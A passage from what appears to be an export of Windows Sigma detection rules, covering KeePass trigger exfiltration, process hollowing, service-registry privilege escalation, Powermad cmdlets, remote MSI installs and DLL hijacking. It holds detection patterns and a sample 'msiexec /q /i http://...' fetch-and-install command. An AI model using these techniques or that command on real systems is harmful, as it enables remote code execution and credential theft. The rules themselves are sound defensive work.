"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6bebbdc8-ffec-4e3d-8572-19125a63f092",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079354Z",
"creation_date": "2026-03-23T11:45:34.079356Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079361Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/alt3kx/CVE-2023-24055_PoC",
"https://keepass.info/help/kb/trigger_examples.html"
],
"name": "t1555_suspicious_process_parent_keepass.yml",
"content": "title: Suspicious Process Launched by KeePass\nid: 6bebbdc8-ffec-4e3d-8572-19125a63f092\ndescription: |\n Detects execution of a suspicious process launched by KeePass.exe that can be the result of a trigger action.\n KeePass allows to configure triggers to automatically launch actions based on different events.\n Attackers can modify the KeePass configuration file KeePass.config.xml to add malicious triggers, for example, to exfiltrate the credentials to an attacker controlled server.\n The CVE 2023-24055 is known to exploit this feature.\n It is recommended to analyze the execution command to look for signs of exfiltration or data theft.\nreferences:\n - https://github.com/alt3kx/CVE-2023-24055_PoC\n - https://keepass.info/help/kb/trigger_examples.html\ndate: 2023/01/27\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - attack.credential_access\n - attack.t1555\n - attack.collection\n - attack.t1119\n - attack.exfiltration\n - attack.t1020.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\KeePass.exe'\n Image|startswith: '?:\\'\n\n exclusion_common:\n Image:\n - '?:\\Program Files\\\\*'\n - '?:\\Program Files (x86)\\\\*'\n - '?:\\Windows\\Explorer.exe'\n - '?:\\windows\\system32\\WerFault.exe'\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '*\\chrome.exe'\n - '*\\firefox.exe'\n - '*\\brave.exe'\n - '*\\sidekick.exe'\n - '*\\putty.exe'\n - '*\\PuTTY\\pageant.exe'\n - '*\\WinSCP\\WinSCP.exe'\n - '*\\KeePass-*\\KeePass.exe'\n - '?:\\Windows\\System32\\mstsc.exe'\n - '*\\AppData\\Local\\KeeForm\\AutoIt3.exe'\n - '*\\AppData\\Local\\Programs\\Opera\\launcher.exe'\n - '?:\\Windows\\System32\\Fondue.exe'\n - '*\\AppData\\Local\\Programs\\Opera GX\\launcher.exe'\n - '?:\\Windows\\Microsoft.NET\\Framework64\\v*\\csc.exe'\n - '?:\\Windows\\System32\\OpenSSH\\ssh.exe'\n - '?:\\Windows\\System32\\bdeunlock.exe'\n - '*\\AppData\\Local\\Programs\\Opera\\opera.exe'\n - '*\\AppData\\Local\\Programs\\Opera GX\\opera.exe'\n - '*\\AppData\\Local\\Vivaldi\\Application\\vivaldi.exe'\n - '*\\Keepass\\KeePass\\Applications\\Chromium\\chrome.exe'\n - '*\\Keepass\\KeePass\\Applications\\Kitty\\kitty_portable.exe'\n - '*\\AppData\\Local\\Chromium\\Application\\chrome.exe'\n\n exclusion_rundll32:\n CommandLine:\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\mshtml.dll,PrintHTML *'\n - '?:\\Windows\\system32\\rundll32.exe cryptext.dll,CryptExtOpenCER ?:\\Users\\\\*'\n - '?:\\windows\\system32\\rundll32.exe cryptext.dll,CryptExtAddPFX ?:\\Users\\\\*'\n - '?:\\WINDOWS\\system32\\rundll32.exe ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile NetworkDiagnosticsSharing ?:\\Users\\\\*'\n - 'rundll32 ?:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\\\*,MonitorPrintJobStatus *'\n\n exclusion_cmdkey:\n CommandLine: '?:\\Windows\\System32\\cmd.exe /c cmdkey /generic:*TERMSRV/* && timeout * && cmdkey /delete*'\n\n exclusion_keepass1:\n OriginalFileName: 'KeePass.exe'\n Signed: 'true'\n Signature: 'Open Source Developer, Dominik Reichl'\n\n exclusion_keepass2:\n Name: 'KeePass.tmp'\n Description: 'Setup/Uninstall'\n\n exclusion_osk:\n OriginalFileName: 'osk.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n # https://www.joeware.net/freetools/tools/cpau/index.htm\n exclusion_cpau:\n Image|endswith: '\\CPAU.exe'\n Company: 'www.joeware.net'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6bebbdc8-ffec-4e3d-8572-19125a63f092",
"rule_name": "Suspicious Process Launched by KeePass",
"rule_description": "Detects execution of a suspicious process launched by KeePass.exe that can be the result of a trigger action.\nKeePass allows to configure triggers to automatically launch actions based on different events.\nAttackers can modify the KeePass configuration file KeePass.config.xml to add malicious triggers, for example, to exfiltrate the credentials to an attacker controlled server.\nThe CVE 2023-24055 is known to exploit this feature.\nIt is recommended to analyze the execution command to look for signs of exfiltration or data theft.\n",
"rule_creation_date": "2023-01-27",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.exfiltration",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1020.001",
"attack.t1119",
"attack.t1546",
"attack.t1555"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6c0a05e4-4c36-4aa7-b69f-43d675d98d73",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075215Z",
"creation_date": "2026-03-23T11:45:34.075217Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075222Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_vbc.yml",
"content": "title: Vbc.exe Sacrificial Process Spawned\nid: 6c0a05e4-4c36-4aa7-b69f-43d675d98d73\ndescription: |\n Detects the suspicious execution of the legitimate vbc.exe Windows binary, spawned without arguments and in an abnormal execution context.\n This can mean that the binary is being used as sacrificial or hollowed process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used by, for instance, by the Vidar malware.\n It is recommended to investigate the parent process performing this action and the destination IP address of the vbc.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/05/13\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProcessTampering\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\Microsoft.NET\\Framework\\v*\\vbc.exe'\n\n filter_ngen:\n CommandLine|startswith: '?:\\Windows\\Microsoft.NET\\framework\\v*\\ngen.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6c0a05e4-4c36-4aa7-b69f-43d675d98d73",
"rule_name": "Vbc.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate vbc.exe Windows binary, spawned without arguments and in an abnormal execution context.\nThis can mean that the binary is being used as sacrificial or hollowed process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used by, for instance, by the Vidar malware.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the vbc.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-05-13",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6c11d396-ac4b-440d-ba67-ffb304d6e65d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.596089Z",
"creation_date": "2026-03-23T11:45:34.596092Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596099Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_process_unprivileged_user_modifying_service_registry_config.yml",
"content": "title: Unprivileged User Modified Service Registry Configuration in Command-line\nid: 6c11d396-ac4b-440d-ba67-ffb304d6e65d\ndescription: |\n Detects registry configuration modifications via command-line that could allow unprivileged users to escalate privileges by modifying service configurations in the registry.\n Such modifications can be indicative of malicious activity, as attackers often exploit registry vulnerabilities to gain elevated privileges.\n Registry keys controlling service configurations are particularly sensitive, as unauthorized changes can lead to service misbehavior or unauthorized access.\n It is recommended to investigate the modified registry key to identify any unauthorized changes and check if the modification leads to a privilege escalation.\nreferences:\n - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n - https://attack.mitre.org/techniques/T1068/\ndate: 2022/09/07\nmodified: 2025/02/11\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - attack.persistence\n - attack.t1574.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_integrity:\n IntegrityLevel:\n - 'Low'\n - 'Medium'\n\n selection_reg:\n OriginalFileName: 'reg.exe'\n CommandLine|contains: 'add'\n\n selection_powershell:\n OriginalFileName: 'powershell.exe'\n CommandLine|contains:\n - 'set-itemproperty'\n - ' sp '\n - 'new-itemproperty'\n\n selection_args_1:\n CommandLine|contains|all:\n - 'ControlSet'\n - 'Services'\n\n selection_args_2:\n CommandLine|contains:\n - 'ImagePath'\n - 'FailureCommand'\n - 'ServiceDll'\n\n condition: selection_integrity and (selection_reg or selection_powershell) and all of selection_args_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6c11d396-ac4b-440d-ba67-ffb304d6e65d",
"rule_name": "Unprivileged User Modified Service Registry Configuration in Command-line",
"rule_description": "Detects registry configuration modifications via command-line that could allow unprivileged users to escalate privileges by modifying service configurations in the registry.\nSuch modifications can be indicative of malicious activity, as attackers often exploit registry vulnerabilities to gain elevated privileges.\nRegistry keys controlling service configurations are particularly sensitive, as unauthorized changes can lead to service misbehavior or unauthorized access.\nIt is recommended to investigate the modified registry key to identify any unauthorized changes and check if the modification leads to a privilege escalation.\n",
"rule_creation_date": "2022-09-07",
"rule_modified_date": "2025-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068",
"attack.t1574.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6c31932d-344c-4c67-80a3-09ee90425956",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606625Z",
"creation_date": "2026-03-23T11:45:34.606628Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606636Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Kevin-Robertson/Powermad",
"https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/",
"https://www.netspi.com/blog/technical/network-penetration-testing/machineaccountquota-transitive-quota/",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1557/001/"
],
"name": "t1059_001_powershell_malicious_cmdlet_powermad_script.yml",
"content": "title: Malicious PowerShell Powermad Commandlets\nid: 6c31932d-344c-4c67-80a3-09ee90425956\ndescription: |\n Detects various malicious commandlets in PowerShell scripts, generally associated with the Powermad framework.\n The Powermad framework is generally associated with Active Directory Internal DNS (ADIDNS) exploitation for privilege escalation and credential collection through LLMNR poisoning (along with tools such as Inveigh) and SMB Relaying.\n It is recommended to investigate the process tree for suspicious activities, to analyze the process responsible for the execution of PowerMad and to look for other malicious activities on the host.\nreferences:\n - https://github.com/Kevin-Robertson/Powermad\n - https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/\n - https://www.netspi.com/blog/technical/network-penetration-testing/machineaccountquota-transitive-quota/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1557/001/\ndate: 2022/10/12\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.credential_access\n - attack.collection\n - attack.t1557.001\n - attack.defense_evasion\n - attack.t1550.002\n - attack.persistence\n - attack.privilege_escalation\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.Powermad\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n # =============================== Machine Account Quota functions =====================================\n # Return machine account attributes.\n - 'Get-MachineAccountAttribute'\n # Returns Machine Account Creator. Usually only set when the node was created by an unprivileged user.\n - 'Get-MachineAccountCreator'\n # Disables a machine account.\n - 'Disable-MachineAccount'\n # Enables a machine account.\n - 'Enable-MachineAccount'\n # Creates a new machine account through an encrypted LDAP request. Can then be used with the `runas` command.\n - 'New-MachineAccount'\n # Removes a machine account with a privileged account.\n - 'Remove-MachineAccount'\n # Set attributes for an account that was created with Powermad.\n - 'Set-MachineAccountAttribute'\n # Recursively creates Machine Accounts, allowed due to the Transitive Machine Account Quota and updates of the ms-DS-CreatorSID attribute.\n - 'Invoke-AgentSmith'\n # ========================================= ADIDNS Functions ==========================================\n # Used to add or delete ADIDNS dynamic DNS records if secure dynamic updates are configured on a DC.\n - 'Invoke-DNSUpdate'\n # Tombstone an ADIDNS node.\n - 'Disable-ADIDNSNode'\n # Revive tombstoned node.\n - 'Enable-ADIDNSNode'\n # Return values that populate a node attribute.\n - 'Get-ADIDNSNodeAttribute'\n # Returns the owner of a node.\n - 'Get-ADIDNSNodeOwner'\n # Gets a DACL (Discretionary Access Control List, which users/groups can access an object) of an ADIDNS node or zone.\n - 'Get-ADIDNSPermission'\n # Returns ADIDNS zones.\n - 'Get-ADIDNSZone'\n # Adds access (ACE) to a node or zone DACL.\n - 'Grant-ADIDNSPermission'\n # Creates a new node thorugh an encrypted LDAP request.\n - 'New-ADIDNSNode'\n # Creates a valid byte array for the dnsRecord attribute.\n - 'New-DNSRecordArray'\n # Gets an SOA (Start of authority) serial number for a DNS zone and increments it.\n - 'New-SOASerialNumberArray'\n # Renames a node.\n - 'Rename-ADIDNSNode'\n # Removes a node.\n - 'Remove-ADIDNSNode'\n # Removes an ACE from a DACL.\n - 'Revoke-ADIDNSPermission'\n # Appends or overwrites node attributes.\n - 'Set-ADIDNSNodeAttribute'\n # Sets the owner of a Node, SeRestorePrivilege token required.\n - 'Set-ADIDNSNodeOwner'\n # Generating Kerberos AES-256 and 128 Keys for know username and password, this can be used as a PtH attack in InvokeDNSUPdate\n - 'Get-KerberosAESKey'\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6c31932d-344c-4c67-80a3-09ee90425956",
"rule_name": "Malicious PowerShell Powermad Commandlets",
"rule_description": "Detects various malicious commandlets in PowerShell scripts, generally associated with the Powermad framework.\nThe Powermad framework is generally associated with Active Directory Internal DNS (ADIDNS) exploitation for privilege escalation and credential collection through LLMNR poisoning (along with tools such as Inveigh) and SMB Relaying.\nIt is recommended to investigate the process tree for suspicious activities, to analyze the process responsible for the execution of PowerMad and to look for other malicious activities on the host.\n",
"rule_creation_date": "2022-10-12",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.defense_evasion",
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1550.002",
"attack.t1557.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6cedca3d-1b27-4809-9533-e910d016c287",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076670Z",
"creation_date": "2026-03-23T11:45:34.076672Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076677Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Msiexec/",
"https://redcanary.com/blog/raspberry-robin/",
"https://attack.mitre.org/techniques/T1218/007/"
],
"name": "t1218_007_msiexec_remote_msi.yml",
"content": "title: MSI Installed from Remote URL\nid: 6cedca3d-1b27-4809-9533-e910d016c287\ndescription: |\n Detects the execution of the legitimate windows binary msiexec.exe to download and install a remote MSI file.\n Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\n It is recommended to verify the legitimity of the URL and the MSI file.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Msiexec/\n - https://redcanary.com/blog/raspberry-robin/\n - https://attack.mitre.org/techniques/T1218/007/\ndate: 2023/04/06\nmodified: 2025/09/09\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.007\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1546.016\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Msiexec\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_msiexec:\n - Image|endswith: 'msiexec.exe'\n - OriginalFileName: 'msiexec.exe'\n\n # Installs the target remote .MSI file\n # msiexec /q /i http://192.168.100.3/tmp/cmd.png\n selection_remote:\n CommandLine|contains:\n - ' http://'\n - ' https://'\n\n exclusion_harfanglab:\n CommandLine|contains|all:\n - 'PORT='\n - 'PROTO='\n - 'HOST='\n - 'SRV_SIG_PUB='\n - '.hurukai.io'\n\n exclusion_legitimate_remote:\n CommandLine|contains:\n - '/i https://aka.ms/installazurecliwindows'\n - '/i https://awscli.amazonaws.com/'\n - '/i https://eu.ninjarmm.com/agent/installer/'\n - '/i https://repository.eset.com/'\n - '/i https://github.com/glpi-project/glpi-agent/releases/download/*/glpi-agent-*.msi'\n - '/i https://download.specopssoft.com/release/client/specops.client.msi'\n - '/i https://cdn.zabbix.com/'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6cedca3d-1b27-4809-9533-e910d016c287",
"rule_name": "MSI Installed from Remote URL",
"rule_description": "Detects the execution of the legitimate windows binary msiexec.exe to download and install a remote MSI file.\nAdversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nIt is recommended to verify the legitimity of the URL and the MSI file.\n",
"rule_creation_date": "2023-04-06",
"rule_modified_date": "2025-09-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1218.007",
"attack.t1546.016"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6cfdcc4f-bbca-4275-b4f1-b08224e74407",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091010Z",
"creation_date": "2026-03-23T11:45:34.091012Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091016Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_certreq.yml",
"content": "title: DLL Hijacking via certreq.exe\nid: 6cfdcc4f-bbca-4275-b4f1-b08224e74407\ndescription: |\n Detects potential Windows DLL Hijacking via certreq.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'certreq.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cscapi.dll'\n - '\\comdlg32.dll'\n - '\\cscobj.dll'\n - '\\cscui.dll'\n - '\\dataexchange.dll'\n - '\\davclnt.dll'\n - '\\drprov.dll'\n - '\\DUI70.dll'\n - '\\dwmapi.dll'\n - '\\explorerframe.dll'\n - '\\LINKINFO.dll'\n - '\\mmdevapi.dll'\n - '\\ncrypt.dll'\n - '\\networkexplorer.dll'\n - '\\ntlanman.dll'\n - '\\p9np.dll'\n - '\\profapi.dll'\n - '\\propsys.dll'\n - '\\secur32.dll'\n - '\\shell32.dll'\n - '\\SSPICLI.DLL'\n - '\\structuredquery.dll'\n - '\\windows.storage.dll'\n - '\\windows.storage.search.dll'\n - '\\WindowsCodecs.dll'\n - '\\WININET.dll'\n - '\\wpdshext.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6cfdcc4f-bbca-4275-b4f1-b08224e74407",
"rule_name": "DLL Hijacking via certreq.exe",
"rule_description": "Detects potential Windows DLL Hijacking via certreq.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6d175d58-b1b2-4cc1-bd38-b7693781a88a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600384Z",
"creation_date": "2026-03-23T11:45:34.600388Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600396Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
